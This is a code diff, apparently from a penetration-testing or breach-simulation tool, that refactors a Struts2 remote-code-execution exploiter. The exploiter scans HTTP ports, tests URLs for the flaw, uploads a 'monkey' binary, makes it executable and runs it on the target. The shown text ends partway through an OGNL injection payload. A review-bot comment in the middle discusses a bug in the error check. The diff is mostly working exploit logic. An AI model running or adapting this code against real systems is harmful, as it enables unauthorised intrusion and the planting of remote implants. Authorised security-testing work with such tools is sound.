Struts2 refactored for framework fixes
parent
bbd4adf2ae
commit
6cb058eb1d
|
@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
|
|||
super(Struts2Exploiter, self).__init__(host)
|
||||
|
||||
def exploit_host(self):
|
||||
# We need a reference to the exploiter for WebRCE framework to use
|
||||
exploiter = self.exploit
|
||||
# Get open ports
|
||||
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = WebRCE.build_potential_urls(self.host, ports)
|
||||
urls = self.build_potential_urls(ports)
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
# Get full URL
|
||||
url = self.get_redirected(url)
|
||||
if WebRCE.check_if_exploitable(exploiter, url):
|
||||
if self.check_if_exploitable(url):
|
||||
vulnerable_urls.append(url)
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
# We need to escape backslashes for our exploiter
|
||||
config = copy.deepcopy(self._config)
|
||||
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
|
||||
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
|
||||
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||
if not self.set_host_arch(vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
|
||||
data = self.upload_monkey(vulnerable_urls[0])
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] == False:
|
||||
if data is not False and data['response'] is False:
|
||||
return False
|
||||
|
||||
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
||||
return False
|
||||
|
||||
return True
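Review bot: The guard `if data is not False and data['response'] is False:` only returns early when the upload produced a dict with a false response; when `upload_monkey` returns `False` itself (the case the `is not False` clause anticipates) execution falls through to `data['path']` on the next statement and raises a TypeError instead of returning False. The check should reject both outcomes, e.g. `if data is False or data['response'] is False: return False`, keeping the existing comment about `''` being a valid response. `upload_monkey` is not visible here, so if it can no longer return `False` the clause is dead and could be dropped instead. Separately, the per-exploiter backslash escaping of `dropper_target_path_win_32/64` has been removed from this method; the `re.sub` on `cmd` in the next hunk suggests escaping now happens centrally in `exploit`, which is worth confirming since an unescaped path would only surface as a failure at execution time on Windows targets.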
|
||||
|
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
|
|||
:param cmd: Code to try and execute on host
|
||||
:return: response
|
||||
"""
|
||||
cmd = re.sub(r"\\", r"\\\\", cmd)
|
||||
cmd = re.sub(r"'", r"\\'", cmd)
|
||||
payload = "%%{(#_='multipart/form-data')." \
|
||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||
"(#_memberAccess?" \
|
||||
|
|